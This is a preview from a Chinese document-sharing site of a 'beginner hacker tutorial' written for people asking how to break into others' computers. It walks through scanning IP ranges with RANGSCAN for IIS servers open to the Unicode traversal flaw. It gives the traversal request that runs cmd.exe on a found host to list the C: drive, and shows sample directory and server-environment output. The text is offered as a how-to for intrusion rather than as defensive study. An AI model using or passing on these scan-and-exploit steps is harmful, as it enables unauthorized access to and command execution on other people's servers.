欢迎来到天天文库
浏览记录
ID:15325317
大小:50.50 KB
页数:17页
时间:2018-08-02
《网络黑客入门教程》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、网络黑客入门教程黑客入门教程由于网上很多朋友问我怎么入侵别人的机器,所以整理了一些我认为容易学的漏洞入侵方法,希望能给初学者一些帮助,下面讲的内容很简单,高手就不用浪费时间看了,:)(1)UNICODE漏洞入侵“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.16
2、8.0.1,在to后面的框里填入192.168.0.255意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如:/scripts/..%c0%af../winnt/system32/cmd.exe这句话的意思是扫描有%c0%af漏洞的机器,对象一般是英文的WIN2000机。我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。
3、这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe意思是192.168.0.111主机有%c0%af漏洞,目标有了,我们马上打开浏览器。在网址栏里输入:100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:回车意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览
4、器里看到类似如:Directoryofc:2002-03-1303:47p289default.asp2002-02-1103:47p289default.htm2002-03-0904:35p
5、Files2002-01-2306:21p
6、dbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:ALLUSERSPROFILE=C:DocumentsandSettingsAllUsersCommonProgramFiles=C:ProgramFilesCommonFilesCOMPUTERNAME=ONComSpec=C:WINNTsystem32cmd.exeCONTENT_LENGTH=0GATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=i
7、mage/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*HTTP_ACCEPT_LANGUAGE=zh-cnHTTP_CONNECTION=Keep-AliveHTTP_HOST=192.168.0.111HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE6.0b;Windows98;Win9x4.90)HTTP_ACCEPT_ENCODING=gzip,deflateHTTPS=offINSTANCE_ID=1LOCAL_ADDR=19
8、2.168.0.111NUMBER_OF_PROCESSORS=1Os2LibPath=C:WINNTsystem32os2dll;OS=Windows_NTPath=C:WINNTsystem32;C:WINNT;C:WINNTSystem32Wbem;C:MSSQL7BINNPATH_TRANSLATE
此文档下载收益归作者所有